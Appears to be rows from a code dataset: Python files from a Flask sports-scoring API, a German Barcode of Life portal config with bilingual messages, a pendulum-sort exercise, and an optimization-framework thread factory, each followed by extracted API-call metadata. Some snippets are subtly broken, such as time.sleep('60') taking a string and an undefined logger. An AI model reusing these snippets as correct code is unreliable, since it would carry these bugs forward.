end_year=end_year,
team=team
)
if isinstance(scoring, Scoring):
return scoring
attrs = [secondary_attr, sort_attr]
reverses = [secondary_reverse, side_of_ball == 'offense']
scoring = sort(data=scoring, attrs=attrs, reverses=reverses)
return rank(data=scoring, attr=sort_attr)
def secondary_sort(attr: str, side_of_ball: str) -> tuple:
"""
Determine the secondary sort attribute and order when the
primary sort attribute has the same value.
Args:
attr (str): The primary sort attribute
side_of_ball (str): Offense or defense
Returns:
tuple: Secondary sort attribute and sort order
"""
if attr == 'points_per_game':
secondary_attr = 'games'
elif attr in ['points', 'relative_points_per_game']:
secondary_attr = 'points_per_game'
else:
secondary_attr = attr
return secondary_attr, side_of_ball == 'offense'
| [((875, 918), 'flask.request.args.get', 'request.args.get', (['"""sort"""', '"""points_per_game"""'], {}), "('sort', 'points_per_game')\n", (891, 918), False, 'from flask import request\n'), ((1380, 1408), 'flask.request.args.get', 'request.args.get', (['"""end_year"""'], {}), "('end_year')\n", (1396, 1408), False, 'from flask import request\n'), ((1424, 1448), 'flask.request.args.get', 'request.args.get', (['"""team"""'], {}), "('team')\n", (1440, 1448), False, 'from flask import request\n'), ((1701, 1804), 'models.Scoring.get_scoring', 'Scoring.get_scoring', ([], {'side_of_ball': 'side_of_ball', 'start_year': 'start_year', 'end_year': 'end_year', 'team': 'team'}), '(side_of_ball=side_of_ball, start_year=start_year,\n end_year=end_year, team=team)\n', (1720, 1804), False, 'from models import Scoring\n'), ((2058, 2108), 'utils.sort', 'sort', ([], {'data': 'scoring', 'attrs': 'attrs', 'reverses': 'reverses'}), '(data=scoring, attrs=attrs, reverses=reverses)\n', (2062, 2108), False, 'from utils import flask_response, rank, sort\n'), ((2124, 2158), 'utils.rank', 'rank', ([], {'data': 'scoring', 'attr': 'sort_attr'}), '(data=scoring, attr=sort_attr)\n', (2128, 2158), False, 'from utils import flask_response, rank, sort\n'), ((763, 836), 'exceptions.InvalidRequestError', 'InvalidRequestError', (['"""Side of ball must be either \'offense\' or \'defense\'"""'], {}), '("Side of ball must be either \'offense\' or \'defense\'")\n', (782, 836), False, 'from exceptions import InvalidRequestError\n'), ((1148, 1211), 'exceptions.InvalidRequestError', 'InvalidRequestError', (['"""Start year is a required query parameter"""'], {}), "('Start year is a required query parameter')\n", (1167, 1211), False, 'from exceptions import InvalidRequestError\n'), ((1274, 1342), 'exceptions.InvalidRequestError', 'InvalidRequestError', (['"""Query parameter start year must be an integer"""'], {}), "('Query parameter start year must be an integer')\n", (1293, 1342), False, 'from exceptions import InvalidRequestError\n'), ((1594, 1660), 'exceptions.InvalidRequestError', 'InvalidRequestError', (['"""Query parameter end year must be an integer"""'], {}), "('Query parameter end year must be an integer')\n", (1613, 1660), False, 'from exceptions import InvalidRequestError\n')] |
ZFMK/GermanBarcodeofLife | WebPortal/gbol_portal/vars.py | f9e9af699ba3f5b3d0d537819a8463c4162d7e82 | import configparser
c = configparser.ConfigParser()
c.read("production.ini")
config = {}
config['host'] = c['dboption']['chost']
config['port'] = int(c['dboption']['cport'])
config['user'] = c['dboption']['cuser']
config['pw'] = c['dboption']['cpw']
config['db'] = c['dboption']['cdb']
config['homepath'] = c['option']['home']
config['hosturl'] = c['option']['hosturl']
config['news'] = c['news']
config['smtp'] = {}
config['smtp']['sender'] = c['option']['smtp-sender']
config['smtp']['server'] = c['option']['smtp']
config['collection_table'] = {}
config['collection_table']['template'] = c['option']['template_collection_sheet']
config['collection_table']['ordered'] = c['option']['collection_table_ordered']
config['collection_table']['filled'] = c['option']['collection_table_filled']
config['dwb'] = {}
config['dwb']['name_suffix'] = c['option']['dwb_name_suffix']
config['dwb']['connection_string'] = c['option']['dwb_connection_string']
config['dwb']['use_dwb'] = int(c['option']['use_dwb'])
if not c.has_option('option', 'dev_group'):
log.critical('Option `dev_group` is not defined in production.ini!\nPlease add at least one email to the list.')
raise NameError('Option `dev_group` is not defined in production.ini!\nPlease add at least one email to the list.')
config['dev_group'] = c['option']['dev_group']
taxon_ids = """100408, 100430, 100431, 100451, 100453, 3000243, 3100522, 3200125,
3200126, 4000014, 4402020, 4403366, 4403382, 4403383, 4404012,
4404135, 4404679, 4405947, 4406565, 4407062, 4408012, 5000093,
5000095, 5000203, 5009403, 5009532, 5100497, 5200013, 5210014,
5220011, 5400004, 5401236, 5413793, 5416518, 5416650, 5426341,
5428084, 5428327, 5428727, 5428849, 5428977, 5429029, 5429176,
5429405, 5430460, 5431215"""
states = {'de': ["Europa",
"Baden-Württemberg",
"Bayern",
"Berlin",
"Brandenburg",
"Bremen",
"Hamburg",
"Hessen",
"Mecklenburg-Vorpommern",
"Niedersachsen",
"Nordrhein-Westfalen",
"Rheinland-Pfalz",
"Saarland",
"Sachsen",
"Sachsen-Anhalt",
"Schleswig-Holstein",
"Thüringen"],
'en': ["Europe",
"Baden-Württemberg",
"Bavaria",
"Berlin",
"Brandenburg",
"Bremen",
"Hamburg",
"Hesse",
"Mecklenburg-Vorpommern",
"Lower Saxony",
"North Rhine Westphalia",
"RhinelandPalatinate",
"Saarland",
"Saxony",
"Saxony-Anhalt",
"Schleswig-Holstein",
"Thuringia"]}
messages = {}
messages['results'] = {}
messages['results']['choose_taxa'] = {'de': '- Bitte wählen Sie ein Taxon aus -',
'en': '- Please choose a taxon -'}
messages['results']['choose_states'] = {'de': '- Bitte wählen Sie ein Bundesland aus -',
'en': '- Please choose a state -'}
messages['news_edit'] = {'de': ' Bearbeiten ', 'en': ' Edit '}
messages['news_reset'] = {'de': " Zurücksetzen ", 'en': " Reset "}
messages['news_reset_html'] = {'de': "<h2><strong>Titel</strong></h2><p>Inhalt</p>",
'en': "<h2><strong>Title</strong></h2><p>Content</p>"}
messages['news_message_saved'] = {'de': "News gespeichert!", 'en': "News saved!"}
messages['news_message_updated'] = {'de': "News bearbeitet!", 'en': "News updated!"}
messages['news_message_empty'] = {'de': "Bitte geben Sie Titel und Inhalt des neuen Newsbeitrages ein!",
'en': "Please enter title and content of the news posting!"}
messages['news_cancel'] = {'de': " Abbrechen ", 'en': " Cancel "}
messages['contact'] = {'de': 'Bitte überprüfen Sie die eingegebenen Daten.', 'en': 'Please check the data entered.'}
messages['contact_send'] = {'de': 'Die Mail wurde versandt!', 'en': 'Send mail was successful!'}
messages['letter_sender'] = {'de': 'Absender', 'en': 'Sender'}
messages['letter_send_to'] = {'de': 'Empfänger', 'en': 'Send to'}
messages['letter_order_no'] = {'de': 'Auftragsnummer {0}', 'en': 'Order no. {0}'}
messages['letter_no_samples'] = {'de': 'Anzahl Proben: {0}', 'en': 'No. samples: {0}'}
messages['letter_body1'] = {'de': 'Hinweis: Bitte drucken Sie das Anschreiben aus oder notieren Sie alternativ die ',
'en': 'Please print this cover letter or write the'}
messages['letter_body2'] = {'de': 'Auftragsnummer auf einem Zettel und legen diesen dem Probenpaket bei.',
'en': 'order number on a slip and send it together with your parcel '
'containing the samples.'}
messages['pls_select'] = {'de': 'Bitte wählen', 'en': 'Please select'}
messages['wrong_credentials'] = {'de': 'Falscher Benutzer oder Passwort!', 'en': 'Wrong user or password!'}
messages['still_locked'] = {'de': 'Sie wurden noch nicht von einem Koordinator freigeschaltet!',
'en': 'Your account must be unlocked by the Administrator!'}
messages['required_fields'] = {'de': 'Bitte alle Pflichtfelder ausfüllen!',
'en': 'Please fill out all required fields!'}
messages['username_present'] = {'de': 'Nutzername schon vorhanden, bitte wählen Sie einen anderen.',
'en': 'Username already present, please choose another one.'}
messages['user_created'] = {'de': 'Ihre Registrierungsanfrage wird bearbeitet. Sie werden in Kürze eine Email '
'Benachichtigung zum Stand Ihrer Freigabe für das GBOL Webportal erhalten.',
'en': 'User created. Please wait for unlock of your account by the administrator.'}
messages['reg_exp_mail_subject'] = {'de': 'Ihre Registrierung beim GBOL Webportal',
'en': 'Your Registration at GBOL Webportal'}
messages['reg_exp_mail_body'] = {'de': 'Hallo {salutation} {title} {vorname} {nachname},\n\n'
'wir haben Ihre Registrierung für die taxonomische Expertise {expertisename} '
'erhalten und an die entsprechenden Koordinatoren weitergeleitet.\n\n'
'Viele Grüße\nIhr GBOL Team',
'en': 'Hello {salutation} {title} {vorname} {nachname},\n\n'
'We have received Your registration for the taxonomic expertise {3} and '
'have send them to the corresponding GBOL-taxon coordinators.\n\n'
'Best regards,\nYour GBOL team'}
messages['reg_exp_chg_mail_body'] = {'de': 'Hallo {tk_user},\n\n{req_user} hat sich für die Expertise {expertisename} '
'registriert.\nBitte prüfen Sie die Angaben und zertifizieren die '
'Expertise anschließend.\n\nViele Grüße\nIhr GBOL Team',
'en': 'Hello {tk_user},\n\n{req_user} applies for the taxonomic expertise '
'{expertisename}.\nPlease check the data and approve or decline the request.'
'\n\nBest regards, Your GBOL team'}
messages['reg_exp_accept'] = {'de': """Hallo {3} {1} {2},
die Expertise {0} in Ihrem GBOL Konto wurde erfolgreich von einem Koordinator freigegeben.
Viele Grüße
Ihr GBOL Team
""", 'en': """Hello {3} {1} {2}
The expertise {0} of your GBOL account has been approved by the coordinator.
Best regards,
The GBOL Team
"""}
messages['reg_exp_decline'] = {'de': """Hallo {3} {1} {2},
die Expertise {0} in Ihrem GBOL Konto wurde von einem Koordinator abgelehnt.
Sie können sich bei Fragen im Kontakt-Bereich bei uns melden.
Viele Grüße
Ihr GBOL Team
""", 'en': """Hello {3} {1} {2}
The expertise {0} of your GBOL account has been refused by the coordinator.
If You have any questions regarding the GBOL approval process, please send us a note in the contact area.
We will answer Your inquiry as soon as possible.
Best regards,
The GBOL Team
"""}
messages['pwd_forgot_email_body'] = {'de': """{0},
eine Anfrage zum Zurücksetzen des Passworts für Ihr Benutzerkonto auf
dem German Barcode of Life Webportal wurde gestellt.
Sie können Ihr Passwort mit einem Klick auf folgenden Link ändern:
http://{1}/sammeln/change-password?link={2}
Ihr Benutzername lautet: {3}
Dieser Link kann nur einmal verwendet werden und leitet Sie zu einer Seite,
auf der Sie ein neues Passwort festlegen können. Er ist einen Tag lang gültig
und läuft automatisch aus, falls Sie ihn nicht verwenden.
Viele Grüße
Das Team von German Barcode of Life""",
'en': """{0},
a request for password reset for your useraccount on the
German Barcode of Life webportal has been posed.
You can change your password with the following link:
http://{1}/sammeln/change-password?link={2}
Your user name is: {3}
Please note: this link can only be used once. The link will direct you to a
website where you can enter a new password.
The link is valid for one day.
Best wishes,
Your team from German Barcode of Life"""}
messages['pwd_forgot_email_subject'] = {'de': 'Neue Login-Daten für {0} auf German Barcode of Life',
'en': 'New login data for your user {0} on German Barcode of '
'Life webportal'}
messages['pwd_forgot_sent'] = {'de': 'Das Passwort und weitere Hinweise wurden an '
'die angegebene Email-Adresse gesendet.',
'en': 'The password and further tips werde sent to your email address.'}
messages['pwd_forgot_not_found'] = {'de': 'Es wurde kein Benutzer mit eingegebenem Namen bzw. Email gefunden.',
'en': 'No user found with the name or the email entered.'}
messages['pwd_unmatch'] = {'de': 'Die beiden Passwörter stimmen nicht überein.', 'en': 'Passwords do not match.'}
messages['pwd_saved'] = {'de': 'Neues Passwort gespeichert.', 'en': 'New password saved'}
messages['pwd__link_used'] = {'de': 'Link wurde bereits benutzt.', 'en': 'The link has been used already'}
messages['pwd__link_invalid'] = {'de': 'Kein gültiger Link.', 'en': 'Link invalid'}
messages['pwd__link_timeout'] = {'de': 'Link ist nicht mehr gültig.', 'en': 'Link has timed out'}
messages['order_success'] = {'de': 'Danke, Ihre Bestellung wurde entgegengenommen.',
'en': 'Thank You, the order has been received.'}
messages['order_info_missing'] = {'de': 'Bitte füllen Sie alle Felder aus.', 'en': 'Please fill out all fields.'}
messages['edt_no_passwd'] = {'de': 'Bitte geben Sie Ihr Passwort an, um das Benutzerprofil zu ändern.',
'en': 'Please provide your password in order to change the userprofile.'}
messages['edt_passwd_wrong'] = {'de': 'Falsches Passwort.', 'en': 'Wrong password.'}
messages['edt_passwd_mismatch'] = {'de': 'Die beiden neuen Passwörter stimmen nicht überein.',
'en': 'Both new passwords do not match.'}
messages['edt_success'] = {'de': 'Benutzerprofil erfolgreich geändert', 'en': 'Userprofile updated.'}
messages['err_upload'] = {'de': 'Ein Fehler ist beim Hochladen der Sammeltabelle aufgetreten. '
'Bitte schicken Sie Ihre Sammeltabelle per E-Mail an den Taxonkoordinator.',
'en': 'An error occured when uploading the collection sheet. Please sent it to the '
'taxon coordinator via e-mail.'}
messages['succ_upload'] = {'de': 'Die Sammeltabelle wurde erfolgreich hochgeladen!',
'en': 'Collection sheet uploaded successfully!'}
messages['download'] = {'de': 'Herunterladen', 'en': 'Download'}
messages['cert'] = {'de': 'zertifiziert', 'en': 'certified'}
messages['subm'] = {'de': 'beantragt', 'en': 'submitted'}
messages['select'] = {'de': 'Auswahl', 'en': 'Please select'}
messages['robot'] = {'de': 'Registrierung konnte nicht durchgeführt werden!', 'en': 'Could not process registration!'}
messages['email_reg_subject'] = {'de': 'GBOL Registrierung', 'en': 'GBOL Registration'}
messages['email_reg_body'] = {'de': """"Hallo {4} {2} {3}
ihr GBOL Konto {0} wurde erfolgreich von einem Koordinator freigegeben.
Sie können sich nun im dem Experten-Bereich anmelden.
Viele Grüße
Ihr GBOL Team
""", 'en': """Hello {4} {2} {3}
Your GBOL account has been approved by the coordinator.
You can now login into the expert area.
Best regards,
The GBOL Team
"""}
messages['email_reg_body_decline'] = {'de': """"Hallo {4} {2} {3}
ihr GBOL Konto {0} wurde von einem Koordinator abgelehnt.
Sie können sich bei Fragen im Kontakt-Bereich von GBOL bei uns melden.
Best regards,
Ihr GBOL Team
""", 'en': """Hello {4} {2} {3}
Your GBoL account has been refused by the coordinator.
If You have any questions regarding the GBoL approval process, please send us a note in the contact area.
We will answer Your inquiry as soon as possible.
Best regards,
The GBOL Team
"""}
messages['states'] = {'de': {'raw': 'Neu', 'cooking': 'in Arbeit', 'done': 'Fertig'},
'en': {'raw': 'New', 'cooking': 'in progress', 'done': 'Done'}}
messages['error'] = {'de': 'Keine Ergebnisse gefunden', 'en': 'Nothing found'}
messages['coord'] = {'de': 'Koordinaten (lat/lon)', 'en': 'Coordinates (lat/lon)'}
messages['taxon'] = {'de': 'Taxon', 'en': 'Higher taxon'}
messages['ncoll'] = {'en': 'Not Collected', 'de': 'Nicht gesammelt'}
messages['nbar'] = {'en': 'No Barcode', 'de': 'Kein Barcode'}
messages['barc'] = {'en': 'Barcode', 'de': 'Barcode'}
messages['pub_updated'] = {'en': 'Publication updated!', 'de': 'Publikation bearbeitet!'}
messages['pub_saved'] = {'en': 'Publication saved!', 'de': 'Publikation gespeichert!'}
messages['pub_error'] = {'en': 'Please enter title and content of the publications posting!',
'de': 'Bitte geben Sie Titel und Inhalt des neuen Publikationsbeitrages ein!'}
messages['mail_req_body'] = """Guten Tag {0},
eine Bestellung für Versandmaterial wurde auf dem GBOL-Portal abgesendet.
Gesendet am {1}
Bestellung:
Material: {2}
Anzahl Verpackungseinheiten: {3}
Taxonomische Gruppe: {4}
Nummer erstes Sammelröhrchen: {5}
Nummer letztes Sammelröhrchen: {6}
Absender:
{name}
{street}
{city}
{country}
Email: {email}
"""
# -- In case of an error one of these messages are send to the dev_group specified in production.ini
messages['error'] = {}
messages['error']['order_processing'] = """
Eine Bestellung für Versandmaterial konnte nicht verarbeitet werden:
Bestellzeit: {1}
Koordinator (User-id): {0}
Möglicher Trasaktions-Key: {9}
Bestellung:
Material: {2}
Anzahl Verpackungseinheiten: {3}
Taxonomische Gruppe (ID): {4}
Nummer erstes Sammelröhrchen: {5}
Nummer letztes Sammelröhrchen: {6}
Bestellt von:
User-ID: {7}
Name: {8}
Fehler:
{10}
"""
| [((25, 52), 'configparser.ConfigParser', 'configparser.ConfigParser', ([], {}), '()\n', (50, 52), False, 'import configparser\n')] |
HernandezDerekJ/Interview | challenges/Backend Challenge/pendulum_sort.py | 202d78767d452ecfe8c6220180d7ed53b1104231 | """
Coderpad solution
"""
def pend(arr):
## arr = [2,3,5,1,4]
## vrr = [0,0,0,0,0]
var = [0] * len(arr)
mid = (len(var) - 1) / 2
## sort_arr = [1,2,3,4,5]
## vrr = [0,0,1,0,0]
sort_arr = sorted(arr)
var[mid] = sort_arr[0]
# ^
# focus shouldn't be at beginning ofr array [1',2,3,4,5]
# ^
# it should be mid [1,2,3,4,5]
# ^
# var [0,0,1,0,0]
# Now it can be flipped left and right for ever increment
# ^ ^
# sort_arr [1,2,3,4,5]
# ^ ^
# var [0,0,1,0,0]
arr_increment = 1
for i in range(1, mid + 1):
#By now the mid is the only position that is correct
#As we parse through var[], we also parse through arr[] and flip values from least to greatest
# ^
# sort_arr [1,2,3,4,5]
# ^
# var [0,0,1,0,0]
var[mid+i] = sort_arr[arr_increment]
arr_increment += 1
# ^
# sort_arr [1,2,3,4,5]
# ^
# var [0,0,1,0,0]
var[mid-i] = sort_arr[arr_increment]
arr_increment += 1
#Odd number of elements
if ((len(sort_arr)-1) % 2 == 1):
# ^
# sort_arr [1,2,3,4,5,6]
# ^
# var [0,0,1,0,0,0]
var[len(arr) - 1] = sort_arr[len(arr) - 1]
print var
if __name__ == "__main__":
arr = [5,1,3,6,2,4]
pend(arr)
arr = [5, 1, 3, 2, 4]
pend(arr)
arr = [10, 4, 1, 5, 4, 3, 7, 9]
pend(arr)
| [] |
garagonc/optimization-framework | swagger_server/controllers/threadFactory.py | 1ca57699d6a3f2f98dcaea96430e75c3f847b49f | import os
import configparser
import json
import time
from IO.inputConfigParser import InputConfigParser
from IO.redisDB import RedisDB
from optimization.ModelException import MissingKeysException
from optimization.controllerDiscrete import OptControllerDiscrete
from optimization.controllerMpc import OptControllerMPC
from optimization.controllerStochasticTestMulti import OptControllerStochastic
#from optimization.controllerStochasticTestPebble import OptControllerStochastic
from prediction.machineLearning import MachineLearning
from prediction.prediction import Prediction
from prediction.pvPrediction import PVPrediction
from utils_intern.constants import Constants
from utils_intern.messageLogger import MessageLogger
class ThreadFactory:
def __init__(self, model_name, control_frequency, horizon_in_steps, dT_in_seconds, repetition, solver, id,
optimization_type, single_ev, restart):
self.id = id
self.logger = MessageLogger.get_logger(__name__, id)
self.model_name = model_name
self.control_frequency = control_frequency
self.horizon_in_steps = horizon_in_steps
self.dT_in_seconds = dT_in_seconds
self.repetition = repetition
self.solver = solver
self.optimization_type = optimization_type
self.single_ev = single_ev
self.redisDB = RedisDB()
self.pyro_mip_server = None
#restart = True
self.restart = restart
def getFilePath(self, dir, file_name):
# print(os.path.sep)
# print(os.environ.get("HOME"))
project_dir = os.path.dirname(os.path.realpath(__file__))
data_file = os.path.join("/usr/src/app", dir, file_name)
return data_file
def startOptControllerThread(self):
self.logger.info("Creating optimization controller thread")
self.logger.info("Number of repetitions: " + str(self.repetition))
self.logger.info("Output with the following control_frequency: " + str(self.control_frequency))
self.logger.info("Optimization calculated with the following horizon_in_steps: " + str(self.horizon_in_steps))
self.logger.info("Optimization calculated with the following dT_in_seconds: " + str(self.dT_in_seconds))
self.logger.info("Optimization calculated with the following model: " + self.model_name)
self.logger.info("Optimization calculated with the following solver: " + self.solver)
self.logger.info("Optimization calculated with the following optimization_type: " + self.optimization_type)
self.redisDB.set("Error mqtt" + self.id, False)
#self.logger.debug("Error mqtt " + str(self.redisDB.get("Error mqtt" + self.id)))
# Creating an object of the configuration file (standard values)
try:
config = configparser.RawConfigParser()
config.read(self.getFilePath("optimization/resources", "ConfigFile.properties"))
except Exception as e:
self.logger.error(e)
# Loads the solver name if it was not given thorough the endpoint command/start/id
if not self.model_name:
self.model_name = config.get("SolverSection", "model.name")
self.logger.debug("This is the model name: " + self.model_name)
self.model_path = os.path.join(config.get("SolverSection", "model.base.path"), self.model_name) + ".py"
self.logger.debug("This is the path of the model: " + str(self.model_path))
# Loads the solver name if not specified in command/start/id
if not self.solver:
self.solver_name = config.get("SolverSection", "solver.name")
else:
self.solver_name = self.solver
self.logger.debug("Optimization calculated with the following solver: " + self.solver_name)
##############################################################################################
output_config = None
try:
# Reads the registry/output and stores it into an object
path = os.path.join(os.getcwd(), "optimization/resources", str(self.id), "Output.registry.mqtt")
if not os.path.exists(path):
self.logger.debug("Output.registry.mqtt not set, only file output available")
else:
with open(path, "r") as file:
output_config = json.loads(file.read())
except Exception as e:
self.logger.error("Output.registry.mqtt not set, only file output available")
try:
# Reads the registry/input and stores it into an object
path = os.path.join(os.getcwd(), "optimization/resources", str(self.id), "Input.registry.file")
if not os.path.exists(path):
input_config_file = {}
self.logger.debug("Not Input.registry.file present")
else:
with open(path, "r") as file:
input_config_file = json.loads(file.read())
self.logger.debug("Input.registry.file found")
except Exception as e:
self.logger.error("Input file not found")
input_config_file = {}
self.logger.error(e)
try:
# Reads the registry/input and stores it into an object
path = os.path.join(os.getcwd(), "optimization/resources", str(self.id), "Input.registry.mqtt")
if not os.path.exists(path):
input_config_mqtt = {}
self.logger.debug("Not Input.registry.mqtt present")
else:
with open(path, "r") as file:
input_config_mqtt = json.loads(file.read())
self.logger.debug("Input.registry.mqtt found")
except Exception as e:
self.logger.error("Input file not found")
input_config_mqtt = {}
self.logger.error(e)
persist_base_path = config.get("IO", "persist.base.file.path")
persist_base_path = os.path.join(os.getcwd(), persist_base_path, str(self.id), Constants.persisted_folder_name)
input_config_parser = InputConfigParser(input_config_file, input_config_mqtt, self.model_name, self.id,
self.optimization_type, persist_base_path, self.restart)
missing_keys = input_config_parser.check_keys_for_completeness()
if len(missing_keys) > 0:
raise MissingKeysException("Data source for following keys not declared: " + str(missing_keys))
opt_values = input_config_parser.get_optimization_values()
self.redisDB.set(self.id+":opt_values", json.dumps(opt_values))
self.prediction_threads = {}
self.prediction_names = input_config_parser.get_prediction_names()
if self.prediction_names is not None and len(self.prediction_names) > 0:
for prediction_name in self.prediction_names:
flag = input_config_parser.get_forecast_flag(prediction_name)
if flag:
self.logger.info("Creating prediction controller thread for topic " + str(prediction_name))
topic_param = input_config_parser.get_params(prediction_name)
parameters = json.dumps(
{"control_frequency": self.control_frequency, "horizon_in_steps": self.horizon_in_steps,
"topic_param": topic_param, "dT_in_seconds": self.dT_in_seconds, "type": "load"})
self.redisDB.set("train:" + self.id + ":" + prediction_name, parameters)
opt_values = input_config_parser.get_optimization_values()
self.prediction_threads[prediction_name] = Prediction(config, self.control_frequency,
self.horizon_in_steps, prediction_name,
topic_param, self.dT_in_seconds, self.id,
output_config, "load", opt_values)
self.prediction_threads[prediction_name].start()
self.pv_lstm_names = input_config_parser.get_pv_lstm_names()
if self.pv_lstm_names is not None and len(self.pv_lstm_names) > 0:
for pv_lstm_name in self.pv_lstm_names:
flag = input_config_parser.get_forecast_flag(pv_lstm_name)
if flag:
self.logger.info("Creating pv lstm controller thread for topic " + str(pv_lstm_name))
topic_param = input_config_parser.get_params(pv_lstm_name)
parameters = json.dumps(
{"control_frequency": self.control_frequency, "horizon_in_steps": self.horizon_in_steps,
"topic_param": topic_param, "dT_in_seconds": self.dT_in_seconds, "type": "pv"})
self.redisDB.set("train:" + self.id + ":" + pv_lstm_name, parameters)
opt_values = input_config_parser.get_optimization_values()
self.prediction_threads[pv_lstm_name] = Prediction(config, self.control_frequency,
self.horizon_in_steps, pv_lstm_name,
topic_param, self.dT_in_seconds, self.id,
output_config, "pv", opt_values)
self.prediction_threads[pv_lstm_name].start()
self.non_prediction_threads = {}
self.non_prediction_names = input_config_parser.get_pv_prediction_names()
if self.non_prediction_names is not None and len(self.non_prediction_names) > 0:
for non_prediction_name in self.non_prediction_names:
flag = input_config_parser.get_forecast_flag(non_prediction_name)
if flag:
self.non_prediction_threads[non_prediction_name] = PVPrediction(config, output_config,
input_config_parser,
self.id,
self.control_frequency,
self.horizon_in_steps,
self.dT_in_seconds,
non_prediction_name)
self.non_prediction_threads[non_prediction_name].start()
# Initializing constructor of the optimization controller thread
if self.optimization_type == "MPC":
self.opt = OptControllerMPC(self.id, self.solver_name, self.model_path, self.control_frequency,
self.repetition, output_config, input_config_parser, config,
self.horizon_in_steps,
self.dT_in_seconds, self.optimization_type)
elif self.optimization_type == "discrete":
self.opt = OptControllerDiscrete(self.id, self.solver_name, self.model_path, self.control_frequency,
self.repetition, output_config, input_config_parser, config,
self.horizon_in_steps,
self.dT_in_seconds, self.optimization_type)
elif self.optimization_type == "stochastic":
self.opt = OptControllerStochastic(self.id, self.solver_name, self.model_path,
self.control_frequency, self.repetition, output_config,
input_config_parser, config, self.horizon_in_steps,
self.dT_in_seconds, self.optimization_type, self.single_ev)
try:
####starts the optimization controller thread
self.logger.debug("Mqtt issue " + str(self.redisDB.get("Error mqtt" + self.id)))
if "False" in self.redisDB.get("Error mqtt" + self.id):
self.opt.start()
self.logger.debug("Optimization object started")
return 0
else:
self.redisDB.set("run:" + self.id, "stopping")
self.stopOptControllerThread()
self.redisDB.set("run:" + self.id, "stopped")
self.logger.error("Optimization object could not be started")
return 2
except Exception as e:
self.logger.error(e)
return 1
def stopOptControllerThread(self):
try:
# stop as per ID
for name, obj in self.prediction_threads.items():
self.redisDB.remove("train:" + self.id + ":" + name)
obj.Stop()
for name, obj in self.non_prediction_threads.items():
obj.Stop()
self.logger.info("Stopping optimization controller thread")
self.opt.Stop()
self.logger.info("Optimization controller thread stopped")
return "Optimization controller thread stopped"
except Exception as e:
self.logger.error(e)
return e
def is_running(self):
return not self.opt.get_finish_status()
def update_training_params(self, key, parameters):
while True:
self.redisDB.set(key, parameters)
time.sleep("60")
| [((963, 1001), 'utils_intern.messageLogger.MessageLogger.get_logger', 'MessageLogger.get_logger', (['__name__', 'id'], {}), '(__name__, id)\n', (987, 1001), False, 'from utils_intern.messageLogger import MessageLogger\n'), ((1357, 1366), 'IO.redisDB.RedisDB', 'RedisDB', ([], {}), '()\n', (1364, 1366), False, 'from IO.redisDB import RedisDB\n'), ((1657, 1701), 'os.path.join', 'os.path.join', (['"""/usr/src/app"""', 'dir', 'file_name'], {}), "('/usr/src/app', dir, file_name)\n", (1669, 1701), False, 'import os\n'), ((6082, 6224), 'IO.inputConfigParser.InputConfigParser', 'InputConfigParser', (['input_config_file', 'input_config_mqtt', 'self.model_name', 'self.id', 'self.optimization_type', 'persist_base_path', 'self.restart'], {}), '(input_config_file, input_config_mqtt, self.model_name,\n self.id, self.optimization_type, persist_base_path, self.restart)\n', (6099, 6224), False, 'from IO.inputConfigParser import InputConfigParser\n'), ((1609, 1635), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (1625, 1635), False, 'import os\n'), ((2809, 2839), 'configparser.RawConfigParser', 'configparser.RawConfigParser', ([], {}), '()\n', (2837, 2839), False, 'import configparser\n'), ((5973, 5984), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (5982, 5984), False, 'import os\n'), ((6601, 6623), 'json.dumps', 'json.dumps', (['opt_values'], {}), '(opt_values)\n', (6611, 6623), False, 'import json\n'), ((10890, 11111), 'optimization.controllerMpc.OptControllerMPC', 'OptControllerMPC', (['self.id', 'self.solver_name', 'self.model_path', 'self.control_frequency', 'self.repetition', 'output_config', 'input_config_parser', 'config', 'self.horizon_in_steps', 'self.dT_in_seconds', 'self.optimization_type'], {}), '(self.id, self.solver_name, self.model_path, self.\n control_frequency, self.repetition, output_config, input_config_parser,\n config, self.horizon_in_steps, self.dT_in_seconds, self.optimization_type)\n', (10906, 11111), False, 'from optimization.controllerMpc import OptControllerMPC\n'), ((13728, 13744), 'time.sleep', 'time.sleep', (['"""60"""'], {}), "('60')\n", (13738, 13744), False, 'import time\n'), ((4037, 4048), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (4046, 4048), False, 'import os\n'), ((4133, 4153), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (4147, 4153), False, 'import os\n'), ((4608, 4619), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (4617, 4619), False, 'import os\n'), ((4703, 4723), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (4717, 4723), False, 'import os\n'), ((5291, 5302), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (5300, 5302), False, 'import os\n'), ((5386, 5406), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (5400, 5406), False, 'import os\n'), ((11297, 11523), 'optimization.controllerDiscrete.OptControllerDiscrete', 'OptControllerDiscrete', (['self.id', 'self.solver_name', 'self.model_path', 'self.control_frequency', 'self.repetition', 'output_config', 'input_config_parser', 'config', 'self.horizon_in_steps', 'self.dT_in_seconds', 'self.optimization_type'], {}), '(self.id, self.solver_name, self.model_path, self.\n control_frequency, self.repetition, output_config, input_config_parser,\n config, self.horizon_in_steps, self.dT_in_seconds, self.optimization_type)\n', (11318, 11523), False, 'from optimization.controllerDiscrete import OptControllerDiscrete\n'), ((7207, 7396), 'json.dumps', 'json.dumps', (["{'control_frequency': self.control_frequency, 'horizon_in_steps': self.\n horizon_in_steps, 'topic_param': topic_param, 'dT_in_seconds': self.\n dT_in_seconds, 'type': 'load'}"], {}), "({'control_frequency': self.control_frequency, 'horizon_in_steps':\n self.horizon_in_steps, 'topic_param': topic_param, 'dT_in_seconds':\n self.dT_in_seconds, 'type': 'load'})\n", (7217, 7396), False, 'import json\n'), ((7674, 7841), 'prediction.prediction.Prediction', 'Prediction', (['config', 'self.control_frequency', 'self.horizon_in_steps', 'prediction_name', 'topic_param', 'self.dT_in_seconds', 'self.id', 'output_config', '"""load"""', 'opt_values'], {}), "(config, self.control_frequency, self.horizon_in_steps,\n prediction_name, topic_param, self.dT_in_seconds, self.id,\n output_config, 'load', opt_values)\n", (7684, 7841), False, 'from prediction.prediction import Prediction\n'), ((8655, 8842), 'json.dumps', 'json.dumps', (["{'control_frequency': self.control_frequency, 'horizon_in_steps': self.\n horizon_in_steps, 'topic_param': topic_param, 'dT_in_seconds': self.\n dT_in_seconds, 'type': 'pv'}"], {}), "({'control_frequency': self.control_frequency, 'horizon_in_steps':\n self.horizon_in_steps, 